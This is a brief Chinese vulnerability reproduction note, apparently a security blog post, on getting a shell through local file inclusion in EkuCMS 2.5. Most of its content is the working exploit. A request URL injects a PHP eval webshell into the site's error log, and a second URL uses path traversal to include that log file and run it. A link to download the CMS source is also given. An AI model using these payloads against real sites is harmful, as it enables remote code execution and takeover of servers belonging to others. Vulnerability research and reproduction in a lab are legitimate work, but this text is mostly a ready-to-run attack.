易酷 cms2.5 本地文件包含漏洞 getshell
易酷 cms2.5 本地文件包含漏洞 getshell
首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php)
安装成功直接进行复现吧
本地包含一句话木马
http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}
会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日
错误日志内容
进行包含错误日志,地址:
http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log
验证下:
源码链接(链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48)